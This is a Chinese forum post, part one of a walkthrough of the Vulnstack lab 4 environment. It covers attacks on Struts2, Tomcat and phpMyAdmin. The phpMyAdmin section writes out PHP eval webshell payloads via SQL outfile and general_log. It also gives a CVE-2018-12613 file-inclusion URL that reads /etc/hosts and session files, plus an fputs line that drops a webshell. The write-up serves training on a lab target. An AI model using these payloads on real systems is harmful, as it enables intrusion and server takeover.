红日靶场四外网到内网(上)

wtt   ·   发表于 2022-05-23 21:25:00   ·   漏洞文章

红日靶场4

外网信息收集与利用

  1. struts2
  2. Tomcat
  3. 任意文件写入
  4. phpmyadmin
  5. CVE-2018-12613 远程文件包含
  6. 任意命令执行
  7. 包含session文件

环境搭建
http://vulnstack.qiyuanxuetang.net/vuln/detail/6/


外网的ip是192.168.3.129
信息收集
没有域名首先扫描端口看开放了哪些服务


22端口爆破无效
利用点一:
2001 有 Struts2尝试一下 Struts2全家桶
S2-045-1漏洞存在命令执行
可以尝试反弹shell


目标不出网不可取
写入shell 找不到返回路径


使用Struts2漏洞利用工具


利用点二:
Tomcat任意文件上传漏洞CVE-2017-12615
方法一


利用点三phpmyadmin


三种方法都试试
一、在网站根目录下
select @@basedir;
select ‘<?php eval($_POST[cmd]); ?>’ into outfile ‘/usr/local/mysql/1.php’;

网站的根目录 没有权限


二,利用mysql日志写文件
show variables like ‘%general%’; #查看日志状态—>即可爆出日志的保存状态和保存路径
SET GLOBAL general_log=’on’;
SET GLOBAL general_log_file=’根目录’; #即设置日志保存的根目录的地址—>即典型你要写马的位置
SELECT ‘<?php eval($_POST[“cmd”]);?>’; #执行语句—>即在日志文件中会直接生成


没有权限
三、CVE-2018-12613远程文件包含(对应版本:phpmyadmin 4.8.1)
payload:
http://192.168.3.129:2003/?target=tbl_zoom_select.php?/../../../../../../etc/hosts


想要包含session文件需要知道存放的session临时文件位置和session命名规则
首先查询select ‘<?php phpinfo();>’; 把php信息记录到session文件
获取session这里tmp为默认路径一般可以通过session.save_path知道其路径


http://192.168.3.129:2003/index.php?target=db_datadict.php%253f../../../../../../../../../tmp/sess_7f9afa3e635a97323bc3ff721e4741de


如何获取shell
通过远程下载或者php执行bash反弹因为这里环境不出网所以尝试使用fputs(fopen(“./1.php”,”a”),”<?php eval($_REQUEST[8]);?>”); 写入文件


接下篇——-

用户名金币积分时间理由
Track-劲夫 60.00 0 2022-05-27 19:07:29 一个受益终生的帖子~~

打赏我,让我更有动力~

2 条回复   |  直到 2022-6-7 | 1480 次浏览

渗透你的美
发表于 2022-5-29

加油

评论列表

  • 加载数据中...

编写评论内容

小熊保安
发表于 2022-6-7

头一次见web目录在mysql绝对路径下。

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.